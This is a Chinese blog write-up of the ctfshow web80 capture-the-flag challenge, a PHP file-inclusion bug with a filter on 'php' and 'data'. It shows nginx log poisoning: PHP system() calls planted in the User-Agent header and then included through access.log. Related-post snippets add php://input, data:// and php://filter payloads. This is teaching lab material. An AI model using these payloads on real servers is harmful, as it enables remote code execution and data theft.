ctfshow-web80(文件包含)

最新推荐文章于 2024-12-23 23:23:16 发布
最新推荐文章于 2024-12-23 23:23:16 发布
阅读量2.2k 收藏 2
点赞数
文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62094846/article/details/122472749
版权 
 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,data,其他伪协议都用不了

考虑用日志文件包含

GET

?file=/var/log/nginx/access.log

User-Agent

<?php system('ls');?>

可能要发几次才能出来

然后再换

<?php system('cat fl0g.php');?>

但页面上 仍然没有flag,查看源代码

m0_62094846
关注
CTFshow 文件包含 web80
Kradress的博客
12-08 1001
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow-web80
m0_73303597的博客
01-04 739
自用
ctfshow 日志包含Web80-81
m0_62584974的博客
04-16 6403
2022/4/16 题目过滤了php和data,我们这次要用日志文件包含 先抓包 nginx日志的默认路径为/var/log/nginx. ssh日志的默认路径为/var/log/auth.log SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述 现在要将恶意代码写入日志文件 /?file=/var/log/nginx/access.log &
php文件包含-CTFshow-web80
读万卷书,行万里路。
07-26 654
0 前言 前面我通过 2 个 CTF 题目来讲解了各种协议在文件包含时的简单用法。这篇文章主要是对 web80 做个简要的分析。 1 解题思路 在 web79 中只过滤了 php,而在 web80 中过滤了 php 和 data。两个题都是使用 str_replace 进行过滤,所以 web80 的思路和 web79 是一样的。 利用大小写绕过 str_replace 函数。(经过测试data 协议无法使用 DATA 绕过。php 伪协议则只能使用 php://input 协议,不能使用 php://fi
ctfshow web80-88
weixin_58519918的博客
04-19 3905
web80) 构建/?file=Php://input post: <?php system("tac fl0g.php")?>【php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。】 因为我在网上看大部分都使用burp来解决这个题目,然后我的burp他在虚拟机里面一直没有落实在本机
ctfshow-web80、81
m0_73590931的博客
08-11 615
然后,代码使用str_replace()函数对file变量进行两次替换操作。第一次替换将file中的php字符串替换为?,第二次替换将file中的data字符串替换为?首先,代码使用isset()函数检查是否存在名为'file'的GET参数。发现与刚刚一样都是user-agent,那还是在user-agent中插入一句话木马,后续做法与web80一样。最后,代码使用include()函数来包含$file变量所代表的文件。意思是将file中的:字符串替换为?看网页信息,发现是nginx服务器。
ctfshow-web入门-文件包含web78、web79、web80web81)
m0_67403143的博客
12-23 797
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。的 base64 编码,也可以实现绕过。
ctfshow-web入门-文件包含web82-web86)条件竞争实现session会话文件包含
最新发布
web13093320398的博客
12-23 1135
file_get_contents 函数将会读取文件的全部内容并将其作为字符串返回,strpos($content, “
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1217
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2734
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
[CTFSHOW]文件包含78-88
Huamang的博客
03-07 700
web 78 php伪协议 payload: file=php://filter/read=convert.base64-encode/resource=flag.php web 79 data协议,用base64编码绕过过滤 payload: file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
ctfshow web入门(文件包含
Blazing-Angel的博客
07-19 814
ctfshow
ctfshow---文件包含
fainpo的博客
03-20 855
伪协议读取即可。
ctfshow文件包含
Vincent0sen的博客
11-13 1343
解法一 - php://input解法二 - data://
ctfshow-文件包含
weixin_74761057的博客
12-17 1135
GET传参,参数为file,没有过滤,直接包含。
[ctfshow web入门]常用姿势801-806
weixin_45751765的博客
04-14 5180
php单引号和双引号包裹的区别
[ctfshow]web入门文件包含78-88
L1ni01
12-04 3263
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
CTFSHOW web入门 文件包含
羽的博客
04-28 3970
文章目录web78web79web80web81web82-86web87web88web116web117 web78 filter伪协议 payload file=php://filter/convert.base64-encode/resource=flag.php 解码后得到flag web79 data伪协议 payload file=data://text/plain,<?=`tac f*`;?> web80 远程文件包含 xxx为自己服务器地址 ?file=http://xxxx
ctfshow-web-web红包题
07-14
其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值